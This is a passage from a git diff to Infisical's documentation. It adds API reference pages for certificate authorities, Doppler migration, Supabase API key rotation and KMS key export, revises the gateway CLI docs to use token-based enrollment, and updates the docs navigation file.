b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/read.mdx new file mode 100644 index 00000000000..1080ee62ede --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/read.mdx @@ -0,0 +1,4 @@ +--- +title: "Read" +openapi: "GET /api/v1/cert-manager/ca/aws-acm-public-ca/{id}" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/update.mdx 
b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/update.mdx new file mode 100644 index 00000000000..ac77c3d006d --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/update.mdx @@ -0,0 +1,4 @@ +--- +title: "Update" +openapi: "PATCH /api/v1/cert-manager/ca/aws-acm-public-ca/{id}" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/digicert/create.mdx b/docs/api-reference/endpoints/certificate-authorities/digicert/create.mdx new file mode 100644 index 00000000000..cc63ba8d679 --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/digicert/create.mdx @@ -0,0 +1,4 @@ +--- +title: "Create" +openapi: "POST /api/v1/pki/ca/digicert" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/digicert/delete.mdx b/docs/api-reference/endpoints/certificate-authorities/digicert/delete.mdx new file mode 100644 index 00000000000..cfd9d068088 --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/digicert/delete.mdx @@ -0,0 +1,4 @@ +--- +title: "Delete" +openapi: "DELETE /api/v1/pki/ca/digicert/{id}" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/digicert/list.mdx b/docs/api-reference/endpoints/certificate-authorities/digicert/list.mdx new file mode 100644 index 00000000000..80389e5d60e --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/digicert/list.mdx @@ -0,0 +1,4 @@ +--- +title: "List" +openapi: "GET /api/v1/pki/ca/digicert" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/digicert/read.mdx b/docs/api-reference/endpoints/certificate-authorities/digicert/read.mdx new file mode 100644 index 00000000000..a085654801d --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/digicert/read.mdx @@ -0,0 +1,4 @@ +--- +title: "Read" +openapi: "GET /api/v1/pki/ca/digicert/{id}" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/digicert/update.mdx 
b/docs/api-reference/endpoints/certificate-authorities/digicert/update.mdx new file mode 100644 index 00000000000..88e082c39c1 --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/digicert/update.mdx @@ -0,0 +1,4 @@ +--- +title: "Update" +openapi: "PATCH /api/v1/pki/ca/digicert/{id}" +--- diff --git a/docs/api-reference/endpoints/external-migrations/doppler/create-config.mdx b/docs/api-reference/endpoints/external-migrations/doppler/create-config.mdx new file mode 100644 index 00000000000..40c7291f801 --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/create-config.mdx @@ -0,0 +1,8 @@ +--- +title: "Create Config" +openapi: "POST /api/v3/external-migrations/doppler/configs" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/external-migrations/doppler/delete-config.mdx b/docs/api-reference/endpoints/external-migrations/doppler/delete-config.mdx new file mode 100644 index 00000000000..432e0340d7b --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/delete-config.mdx @@ -0,0 +1,8 @@ +--- +title: "Delete Config" +openapi: "DELETE /api/v3/external-migrations/doppler/configs/{id}" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. 
+ diff --git a/docs/api-reference/endpoints/external-migrations/doppler/get-configs.mdx b/docs/api-reference/endpoints/external-migrations/doppler/get-configs.mdx new file mode 100644 index 00000000000..61b82fc60d6 --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/get-configs.mdx @@ -0,0 +1,8 @@ +--- +title: "Get Configs" +openapi: "GET /api/v3/external-migrations/doppler/configs" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/external-migrations/doppler/get-environments.mdx b/docs/api-reference/endpoints/external-migrations/doppler/get-environments.mdx new file mode 100644 index 00000000000..0ff1c8219b3 --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/get-environments.mdx @@ -0,0 +1,8 @@ +--- +title: "Get Environments" +openapi: "GET /api/v3/external-migrations/doppler/environments" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/external-migrations/doppler/get-projects.mdx b/docs/api-reference/endpoints/external-migrations/doppler/get-projects.mdx new file mode 100644 index 00000000000..36e8e982f83 --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/get-projects.mdx @@ -0,0 +1,8 @@ +--- +title: "Get Projects" +openapi: "GET /api/v3/external-migrations/doppler/projects" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. 
+ diff --git a/docs/api-reference/endpoints/external-migrations/doppler/import-secrets.mdx b/docs/api-reference/endpoints/external-migrations/doppler/import-secrets.mdx new file mode 100644 index 00000000000..80420124e5e --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/import-secrets.mdx @@ -0,0 +1,8 @@ +--- +title: "Import Secrets" +openapi: "POST /api/v3/external-migrations/doppler/import-secrets" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/external-migrations/doppler/update-config.mdx b/docs/api-reference/endpoints/external-migrations/doppler/update-config.mdx new file mode 100644 index 00000000000..11cb813a754 --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/update-config.mdx @@ -0,0 +1,8 @@ +--- +title: "Update Config" +openapi: "PUT /api/v3/external-migrations/doppler/configs/{id}" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. 
+ diff --git a/docs/api-reference/endpoints/kms/keys/bulk-export-private-keys.mdx b/docs/api-reference/endpoints/kms/keys/bulk-export-private-keys.mdx new file mode 100644 index 00000000000..e6725cea20b --- /dev/null +++ b/docs/api-reference/endpoints/kms/keys/bulk-export-private-keys.mdx @@ -0,0 +1,4 @@ +--- +title: "Bulk Export Private Keys" +openapi: "POST /api/v1/kms/keys/bulk-export-private-keys" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/create.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/create.mdx new file mode 100644 index 00000000000..31b43527f4c --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/create.mdx @@ -0,0 +1,77 @@ +--- +title: "Create" +openapi: "POST /api/v2/secret-rotations/supabase-api-key" +--- + + + Check out the configuration docs for [Supabase API Key Rotations](/documentation/platform/secret-rotation/supabase-api-key) to learn how to obtain the required parameters. + + +Creates a Supabase API Key secret rotation. Infisical will create and rotate API keys via your [Supabase connection](/integrations/app-connections/supabase) and write them to the specified secret path. + +## Request body + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| `name` | string | Yes | A unique name for the rotation (max 100 characters). | +| `projectId` | string (UUID) | Yes | The project ID. | +| `connectionId` | string (UUID) | Yes | ID of the Supabase app connection. | +| `environment` | string | Yes | Environment slug (e.g. `dev`, `prod`). | +| `secretPath` | string | Yes | Path where the generated API key secret will be stored. | +| `isAutoRotationEnabled` | boolean | No | Whether to rotate automatically on the schedule. Defaults to `true`. | +| `rotationInterval` | number | Yes | Days between rotations (minimum `1`). | +| `rotateAtUtc` | object | No | Time of day (UTC) to run rotation: `{ "hours", "minutes" }`. 
Defaults to `{ "hours": 0, "minutes": 0 }`. | +| `parameters.projectRef` | string | Yes | The reference ID of the Supabase project to rotate the API key for. | +| `parameters.keyType` | string | Yes | The type of the API key to rotate: `"publishable"` or `"secret"`. | +| `secretsMapping.apiKey` | string | Yes | Secret key name to store the generated API key (e.g. `SUPABASE_SECRET_API_KEY`). | +| `description` | string | No | Optional description. | + +## Sample request + +```bash +curl --request POST \ + --url https://us.infisical.com/api/v2/secret-rotations/supabase-api-key \ + --header 'Content-Type: application/json' \ + --header 'Authorization: Bearer ' \ + --data '{ + "name": "my-supabase-rotation", + "projectId": "", + "description": "Supabase API key rotation", + "connectionId": "", + "environment": "dev", + "secretPath": "/", + "isAutoRotationEnabled": true, + "rotationInterval": 30, + "rotateAtUtc": { "hours": 0, "minutes": 0 }, + "parameters": { + "projectRef": "", + "keyType": "secret" + }, + "secretsMapping": { + "apiKey": "SUPABASE_SECRET_API_KEY" + } + }' +``` + +## Sample response + +```json +{ + "secretRotation": { + "id": "", + "name": "my-supabase-rotation", + "description": "Supabase API key rotation", + "secretsMapping": { "apiKey": "SUPABASE_SECRET_API_KEY" }, + "isAutoRotationEnabled": true, + "activeIndex": 0, + "connectionId": "", + "rotationInterval": 30, + "rotateAtUtc": { "hours": 0, "minutes": 0 }, + "type": "supabase-api-key", + "parameters": { + "projectRef": "", + "keyType": "secret" + } + } +} +``` diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/delete.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/delete.mdx new file mode 100644 index 00000000000..9ceb12ea6af --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/delete.mdx @@ -0,0 +1,4 @@ +--- +title: "Delete" +openapi: "DELETE /api/v2/secret-rotations/supabase-api-key/{rotationId}" +--- diff --git 
a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-id.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-id.mdx new file mode 100644 index 00000000000..87b8ae2dca7 --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-id.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by ID" +openapi: "GET /api/v2/secret-rotations/supabase-api-key/{rotationId}" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-name.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-name.mdx new file mode 100644 index 00000000000..99655c65022 --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-name.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by Name" +openapi: "GET /api/v2/secret-rotations/supabase-api-key/rotation-name/{rotationName}" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-generated-credentials-by-id.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-generated-credentials-by-id.mdx new file mode 100644 index 00000000000..375c2bd8562 --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-generated-credentials-by-id.mdx @@ -0,0 +1,4 @@ +--- +title: "Get Credentials by ID" +openapi: "GET /api/v2/secret-rotations/supabase-api-key/{rotationId}/generated-credentials" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/list.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/list.mdx new file mode 100644 index 00000000000..9970adb0acb --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/list.mdx @@ -0,0 +1,4 @@ +--- +title: "List" +openapi: "GET /api/v2/secret-rotations/supabase-api-key" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/rotate-secrets.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/rotate-secrets.mdx 
new file mode 100644 index 00000000000..083f0788797 --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/rotate-secrets.mdx @@ -0,0 +1,4 @@ +--- +title: "Rotate Secrets" +openapi: "POST /api/v2/secret-rotations/supabase-api-key/{rotationId}/rotate-secrets" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/update.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/update.mdx new file mode 100644 index 00000000000..49d888b85fe --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/update.mdx @@ -0,0 +1,8 @@ +--- +title: "Update" +openapi: "PATCH /api/v2/secret-rotations/supabase-api-key/{rotationId}" +--- + + + Check out the configuration docs for [Supabase API Key Rotations](/documentation/platform/secret-rotation/supabase-api-key) to learn how to obtain the required parameters. + diff --git a/docs/cli/commands/gateway.mdx b/docs/cli/commands/gateway.mdx index e7da7a74f6c..53226c024b9 100644 --- a/docs/cli/commands/gateway.mdx +++ b/docs/cli/commands/gateway.mdx @@ -4,14 +4,14 @@ description: "Run the Infisical gateway or manage its systemd service" --- - + ```bash - sudo infisical gateway start --name= --auth-method= + infisical gateway start --enroll-method=token --token= --domain= ``` - + ```bash - sudo infisical gateway systemd install --token= --domain= --name= + sudo infisical gateway systemd install --enroll-method=token --token= --domain= ``` @@ -36,9 +36,11 @@ If you are moving from Gateway v1 to Gateway v2, this is NOT a drop-in switch. G Run the Infisical gateway component within the network where your target resources are located. The gateway establishes an SSH reverse tunnel to a relay server and provides secure access to private resources within your network. ```bash -sudo infisical gateway start --name= --auth-method= +infisical gateway start --enroll-method=token --token= --domain= ``` +The gateway name is provided as a positional argument.
+ By default, the gateway automatically connects to the relay with the lowest latency. To target a specific relay, use the `--target-relay-name=` flag. @@ -51,207 +53,34 @@ Once started, the gateway component will: - Automatically reconnect if the connection is lost - Provide access to private resources within your network -### Authentication - -The Gateway supports multiple authentication methods. Below are the available authentication methods, with their respective flags. - - - - The Universal Auth method is a simple and secure way to authenticate with Infisical. It requires a client ID and a client secret to authenticate with Infisical. - - - - - Your machine identity client ID. - - - Your machine identity client secret. - - - The authentication method to use. Must be `universal-auth` when using Universal Auth. - - - - - ```bash - sudo infisical gateway start --auth-method=universal-auth --client-id= --client-secret= --name= - ``` +### Flags - - - The Native Kubernetes method is used to authenticate with Infisical when running in a Kubernetes environment. It requires a service account token to authenticate with Infisical. + + + The enrollment method to use. Currently only `token` is supported. Additional authentication methods will be available in the future. - - Your machine identity ID. - - - Path to the Kubernetes service account token to use. Default: `/var/run/secrets/kubernetes.io/serviceaccount/token`. - - - The authentication method to use. Must be `kubernetes` when using Native Kubernetes. - - - - - - - ```bash - sudo infisical gateway start --auth-method=kubernetes --machine-identity-id= --name= - ``` - - - - The Native Azure method is used to authenticate with Infisical when running in an Azure environment. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `azure` when using Native Azure. 
- - - - - - - ```bash - sudo infisical gateway start --auth-method=azure --machine-identity-id= --name= - ``` - - - - The Native GCP ID Token method is used to authenticate with Infisical when running in a GCP environment. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `gcp-id-token` when using Native GCP ID Token. - - - - - - - ```bash - sudo infisical gateway start --auth-method=gcp-id-token --machine-identity-id= --name= - ``` - - - - The GCP IAM method is used to authenticate with Infisical with a GCP service account key. - - - - - Your machine identity ID. - - - Path to your GCP service account key file _(Must be in JSON format!)_ - - - The authentication method to use. Must be `gcp-iam` when using GCP IAM. - - - - - ```bash - sudo infisical gateway start --auth-method=gcp-iam --machine-identity-id= --service-account-key-file-path= --name= - ``` - - - - The AWS IAM method is used to authenticate with Infisical with an AWS IAM role while running in an AWS environment like EC2, Lambda, etc. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `aws-iam` when using Native AWS IAM. + + Must be `token` when using an enrollment token. - - - - ```bash - sudo infisical gateway start --auth-method=aws-iam --machine-identity-id= --name= - ``` - - - - The OIDC Auth method is used to authenticate with Infisical via identity tokens with OIDC. - - - - - Your machine identity ID. - - - The OIDC JWT from the identity provider. - - - The authentication method to use. Must be `oidc-auth` when using OIDC Auth. - - - - - ```bash - sudo infisical gateway start --auth-method=oidc-auth --machine-identity-id= --jwt= --name= - ``` - - - - - The JWT Auth method is used to authenticate with Infisical via a JWT token. - - - - - The JWT token to use for authentication. - - - Your machine identity ID. + + The one-time enrollment token from the Infisical UI. - - The authentication method to use. 
Must be `jwt-auth` when using JWT Auth. + + The URL of your Infisical instance. - ```bash - sudo infisical gateway start --auth-method=jwt-auth --jwt= --machine-identity-id= --name= + infisical gateway start my-gateway --enroll-method=token --token= --domain=https://app.infisical.com ``` - - - You can use the `INFISICAL_TOKEN` environment variable to authenticate with Infisical with a raw machine identity access token. - - - - - The machine identity access token to use for authentication. - - - - - ```bash - sudo infisical gateway start --token= --name= - ``` + After enrollment, the gateway saves its credentials locally. You can safely re-run the same command to restart the gateway. It will detect the token has already been used and skip enrollment automatically. - - -### Other Flags - The name of the relay that this gateway should connect to. The relay must be running and registered before starting the gateway. @@ -259,29 +88,19 @@ The Gateway supports multiple authentication methods. Below are the available au ```bash # Example - sudo infisical gateway start --target-relay-name=my-relay --name=my-gateway --token= + infisical gateway start my-gateway --target-relay-name=my-relay --enroll-method=token --token= --domain= ``` **Note:** For Infisical Cloud users using instance relays, the relay infrastructure is already running and managed by Infisical. If using organization relays or self-hosted instance relays, you must first start a relay server. For more information on deploying relays, refer to the [Relay Deployment Guide](/documentation/platform/gateways/relay-deployment). - - The name of the gateway instance. - - ```bash - # Example - sudo infisical gateway start --name=my-gateway --token= - ``` - - - Domain of your self-hosted Infisical instance. 
```bash # Example - sudo infisical gateway start --domain=https://app.your-domain.com --name= + infisical gateway start --domain=https://app.your-domain.com --enroll-method=token --token= ``` @@ -292,7 +111,7 @@ The Gateway supports multiple authentication methods. Below are the available au Install and enable the gateway as a systemd service. This command must be run with sudo on Linux. ```bash -sudo infisical gateway systemd install --token= --domain= --name= +sudo infisical gateway systemd install my-gateway --enroll-method=token --token= --domain= ``` ### Requirements @@ -304,34 +123,32 @@ sudo infisical gateway systemd install --token= --domain= --name= ### Flags - - The machine identity access token to authenticate with Infisical. + + The enrollment method to use. Currently only `token` is supported. ```bash # Example - sudo infisical gateway systemd install --token= --name= + sudo infisical gateway systemd install my-gateway --enroll-method=token --token= --domain= ``` - You may also expose the token to the CLI by setting the environment variable `INFISICAL_TOKEN` before executing the install command. - - - Domain of your self-hosted Infisical instance. + + The one-time enrollment token from the Infisical UI. ```bash # Example - sudo infisical gateway systemd install --domain=https://app.your-domain.com --name= + sudo infisical gateway systemd install my-gateway --enroll-method=token --token= --domain= ``` - - The name of the gateway instance. + + Domain of your self-hosted Infisical instance. 
```bash # Example - sudo infisical gateway systemd install --name=my-gateway --token= + sudo infisical gateway systemd install my-gateway --enroll-method=token --token= --domain=https://app.your-domain.com ``` @@ -343,7 +160,7 @@ sudo infisical gateway systemd install --token= --domain= --name= ```bash # Example - sudo infisical gateway systemd install --target-relay-name=my-relay --token= --name= + sudo infisical gateway systemd install my-gateway --target-relay-name=my-relay --enroll-method=token --token= --domain= ``` **Note:** For Infisical Cloud users using instance relays, the relay infrastructure is already running and managed by Infisical. If using organization relays or self-hosted instance relays, you must first start a relay server. For more information on deploying relays, refer to the [Relay Deployment Guide](/documentation/platform/gateways/relay-deployment). @@ -397,204 +214,6 @@ Run the legacy Infisical gateway in the foreground. The gateway will connect to infisical gateway --domain= --auth-method= ``` -### Authentication - -The Infisical CLI supports multiple authentication methods. Below are the available authentication methods, with their respective flags. - - - - The Universal Auth method is a simple and secure way to authenticate with Infisical. It requires a client ID and a client secret to authenticate with Infisical. - - - - - Your machine identity client ID. - - - Your machine identity client secret. - - - The authentication method to use. Must be `universal-auth` when using Universal Auth. - - - - - ```bash - infisical gateway --auth-method=universal-auth --client-id= --client-secret= - ``` - - - - The Native Kubernetes method is used to authenticate with Infisical when running in a Kubernetes environment. It requires a service account token to authenticate with Infisical. - - - - - Your machine identity ID. - - - Path to the Kubernetes service account token to use. Default: `/var/run/secrets/kubernetes.io/serviceaccount/token`. 
- - - The authentication method to use. Must be `kubernetes` when using Native Kubernetes. - - - - - - - ```bash - infisical gateway --auth-method=kubernetes --machine-identity-id= - ``` - - - - The Native Azure method is used to authenticate with Infisical when running in an Azure environment. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `azure` when using Native Azure. - - - - - - - ```bash - infisical gateway --auth-method=azure --machine-identity-id= - ``` - - - - The Native GCP ID Token method is used to authenticate with Infisical when running in a GCP environment. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `gcp-id-token` when using Native GCP ID Token. - - - - - - - ```bash - infisical gateway --auth-method=gcp-id-token --machine-identity-id= - ``` - - - - The GCP IAM method is used to authenticate with Infisical with a GCP service account key. - - - - - Your machine identity ID. - - - Path to your GCP service account key file _(Must be in JSON format!)_ - - - The authentication method to use. Must be `gcp-iam` when using GCP IAM. - - - - - ```bash - infisical gateway --auth-method=gcp-iam --machine-identity-id= --service-account-key-file-path= - ``` - - - - The AWS IAM method is used to authenticate with Infisical with an AWS IAM role while running in an AWS environment like EC2, Lambda, etc. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `aws-iam` when using Native AWS IAM. - - - - - ```bash - infisical gateway --auth-method=aws-iam --machine-identity-id= - ``` - - - - The OIDC Auth method is used to authenticate with Infisical via identity tokens with OIDC. - - - - - Your machine identity ID. - - - The OIDC JWT from the identity provider. - - - The authentication method to use. Must be `oidc-auth` when using OIDC Auth. 
- - - - - ```bash - infisical gateway --auth-method=oidc-auth --machine-identity-id= --jwt= - ``` - - - - - The JWT Auth method is used to authenticate with Infisical via a JWT token. - - - - - The JWT token to use for authentication. - - - Your machine identity ID. - - - The authentication method to use. Must be `jwt-auth` when using JWT Auth. - - - - - - ```bash - infisical gateway --auth-method=jwt-auth --jwt= --machine-identity-id= - ``` - - - - You can use the `INFISICAL_TOKEN` environment variable to authenticate with Infisical with a raw machine identity access token. - - - - - The machine identity access token to use for authentication. - - - - - ```bash - infisical gateway --token= - ``` - - - - ### Other Flags @@ -632,32 +251,6 @@ sudo infisical gateway install --token= --domain= - Must be run with root/sudo privileges - Requires systemd -### Flags - - - - The machine identity access token to authenticate with Infisical. - - ```bash - # Example - sudo infisical gateway install --token= - ``` - - You may also expose the token to the CLI by setting the environment variable `INFISICAL_TOKEN` before executing the install command. - - - - - Domain of your self-hosted Infisical instance. - - ```bash - # Example - sudo infisical gateway install --domain=https://app.your-domain.com - ``` - - - - ### Service Details The systemd service is installed with secure defaults: @@ -686,10 +279,16 @@ sudo systemctl disable infisical-gateway # Disable auto-start on boot ## Frequently Asked Questions + + Yes. The CLI stores the enrollment token locally after the first successful enrollment. If you run the same command again with the same `--token` value, it detects the token has already been used and skips enrollment, proceeding directly to start the gateway. This means you can safely use the same command (e.g., via up-arrow in your shell) without getting "token already used" or "token expired" errors. 
+ If the `--target-relay-name` flag is omitted, the gateway automatically selects the optimal relay. It first checks for healthy organization relays and connects to the one with the lowest latency. If no organization relays are available, it then performs the same latency-based selection among the available managed relays. No. The first time the gateway starts, it selects the optimal relay (based on latency) and caches that selection. On subsequent restarts, it will prioritize connecting to the cached relay. If it's unable to connect, it will then re-evaluate and connect to the next most optimal relay available. + + Yes. Additional gateway authentication methods are planned for future releases. + diff --git a/docs/docs.json b/docs/docs.json index f00db502ad8..c8703ba396c 100644 --- a/docs/docs.json +++ b/docs/docs.json @@ -124,7 +124,9 @@ "integrations/app-connections/cloudflare", "integrations/app-connections/databricks", "integrations/app-connections/dbt", + "integrations/app-connections/digicert", "integrations/app-connections/digital-ocean", + "integrations/app-connections/doppler", "integrations/app-connections/dns-made-easy", "integrations/app-connections/flyio", "integrations/app-connections/gcp", @@ -144,6 +146,7 @@ "integrations/app-connections/netlify", "integrations/app-connections/netscaler", "integrations/app-connections/northflank", + "integrations/app-connections/ona", "integrations/app-connections/oci", "integrations/app-connections/octopus-deploy", "integrations/app-connections/okta", @@ -156,7 +159,9 @@ "integrations/app-connections/supabase", "integrations/app-connections/teamcity", "integrations/app-connections/terraform-cloud", + "integrations/app-connections/travis-ci", "integrations/app-connections/venafi", + "integrations/app-connections/venafi-tpp", "integrations/app-connections/vercel", "integrations/app-connections/windmill", "integrations/app-connections/smb", @@ -177,6 +182,7 @@ "group": "External Migrations", "pages": [ 
"documentation/platform/external-migrations/overview", + "documentation/platform/external-migrations/doppler", "documentation/platform/external-migrations/envkey", "documentation/platform/external-migrations/vault" ] @@ -193,6 +199,7 @@ "group": "Gateway", "pages": [ "documentation/platform/gateways/overview", + "documentation/platform/gateways/gateway-pools", "documentation/platform/gateways/gateway-deployment", { "group": "Relay Deployment", @@ -478,6 +485,7 @@ "documentation/platform/secret-rotation/oracledb-credentials", "documentation/platform/secret-rotation/postgres-credentials", "documentation/platform/secret-rotation/redis-credentials", + "documentation/platform/secret-rotation/supabase-api-key", "documentation/platform/secret-rotation/unix-linux-local-account", "documentation/platform/secret-rotation/windows-local-account" ] @@ -596,6 +604,7 @@ "integrations/secret-syncs/laravel-forge", "integrations/secret-syncs/netlify", "integrations/secret-syncs/northflank", + "integrations/secret-syncs/ona", "integrations/secret-syncs/oci-vault", "integrations/secret-syncs/octopus-deploy", "integrations/secret-syncs/railway", @@ -603,6 +612,7 @@ "integrations/secret-syncs/supabase", "integrations/secret-syncs/teamcity", "integrations/secret-syncs/terraform-cloud", + "integrations/secret-syncs/travis-ci", "integrations/secret-syncs/vercel", "integrations/secret-syncs/windmill", "integrations/secret-syncs/zabbix" @@ -830,10 +840,13 @@ "documentation/platform/pki/ca/acme-ca", "documentation/platform/pki/ca/lets-encrypt", "documentation/platform/pki/ca/digicert", + "documentation/platform/pki/ca/digicert-direct", "documentation/platform/pki/ca/sectigo", "documentation/platform/pki/ca/azure-adcs", "documentation/platform/pki/ca/aws-pca", - "documentation/platform/pki/ca/venafi" + "documentation/platform/pki/ca/aws-acm-public-ca", + "documentation/platform/pki/ca/venafi", + "documentation/platform/pki/ca/venafi-tpp" ] } ] @@ -917,29 +930,9 @@ ] }, { - "item": "Agent 
Sentinel", - "groups": [ - { - "group": "Agent Sentinel", - "pages": [ - "documentation/platform/agent-sentinel/overview", - { - "group": "Concepts", - "pages": [ - "documentation/platform/agent-sentinel/concepts/mcp-overview" - ] - } - ] - }, - { - "group": "Product Reference", - "pages": [ - "documentation/platform/agent-sentinel/mcp-servers", - "documentation/platform/agent-sentinel/mcp-endpoints", - "documentation/platform/agent-sentinel/activity-logs" - ] - } - ] + "item": "Agent Vault", + "icon": "arrow-up-right-from-square", + "href": "https://docs.agent-vault.dev/" } ] }, @@ -1469,6 +1462,18 @@ "api-reference/endpoints/app-connections/dbt/delete" ] }, + { + "group": "DigiCert", + "pages": [ + "api-reference/endpoints/app-connections/digicert/list", + "api-reference/endpoints/app-connections/digicert/available", + "api-reference/endpoints/app-connections/digicert/get-by-id", + "api-reference/endpoints/app-connections/digicert/get-by-name", + "api-reference/endpoints/app-connections/digicert/create", + "api-reference/endpoints/app-connections/digicert/update", + "api-reference/endpoints/app-connections/digicert/delete" + ] + }, { "group": "Digital Ocean", "pages": [ @@ -1481,6 +1486,18 @@ "api-reference/endpoints/app-connections/digital-ocean/delete" ] }, + { + "group": "Doppler", + "pages": [ + "api-reference/endpoints/app-connections/doppler/list", + "api-reference/endpoints/app-connections/doppler/available", + "api-reference/endpoints/app-connections/doppler/get-by-id", + "api-reference/endpoints/app-connections/doppler/get-by-name", + "api-reference/endpoints/app-connections/doppler/create", + "api-reference/endpoints/app-connections/doppler/update", + "api-reference/endpoints/app-connections/doppler/delete" + ] + }, { "group": "Fly.io", "pages": [ @@ -2349,6 +2366,19 @@ "api-reference/endpoints/secret-rotations/redis-credentials/update" ] }, + { + "group": "Supabase API Key", + "pages": [ + 
"api-reference/endpoints/secret-rotations/supabase-api-key/create", + "api-reference/endpoints/secret-rotations/supabase-api-key/delete", + "api-reference/endpoints/secret-rotations/supabase-api-key/get-by-id", + "api-reference/endpoints/secret-rotations/supabase-api-key/get-by-name", + "api-reference/endpoints/secret-rotations/supabase-api-key/get-generated-credentials-by-id", + "api-reference/endpoints/secret-rotations/supabase-api-key/list", + "api-reference/endpoints/secret-rotations/supabase-api-key/rotate-secrets", + "api-reference/endpoints/secret-rotations/supabase-api-key/update" + ] + }, { "group": "HP iLO Local Account", "pages": [ @@ -2930,6 +2960,26 @@ "api-reference/endpoints/certificate-authorities/aws-pca/delete" ] }, + { + "group": "DigiCert", + "pages": [ + "api-reference/endpoints/certificate-authorities/digicert/list", + "api-reference/endpoints/certificate-authorities/digicert/create", + "api-reference/endpoints/certificate-authorities/digicert/read", + "api-reference/endpoints/certificate-authorities/digicert/update", + "api-reference/endpoints/certificate-authorities/digicert/delete" + ] + }, + { + "group": "AWS ACM Public CA", + "pages": [ + "api-reference/endpoints/certificate-authorities/aws-acm-public-ca/list", + "api-reference/endpoints/certificate-authorities/aws-acm-public-ca/create", + "api-reference/endpoints/certificate-authorities/aws-acm-public-ca/read", + "api-reference/endpoints/certificate-authorities/aws-acm-public-ca/update", + "api-reference/endpoints/certificate-authorities/aws-acm-public-ca/delete" + ] + }, { "group": "Internal", "pages": [ @@ -3239,7 +3289,8 @@ "api-reference/endpoints/kms/keys/update", "api-reference/endpoints/kms/keys/delete", "api-reference/endpoints/kms/keys/public-key", - "api-reference/endpoints/kms/keys/private-key" + "api-reference/endpoints/kms/keys/private-key", + "api-reference/endpoints/kms/keys/bulk-export-private-keys" ] }, { @@ -3259,6 +3310,23 @@ } ] }, + { + "group": "External 
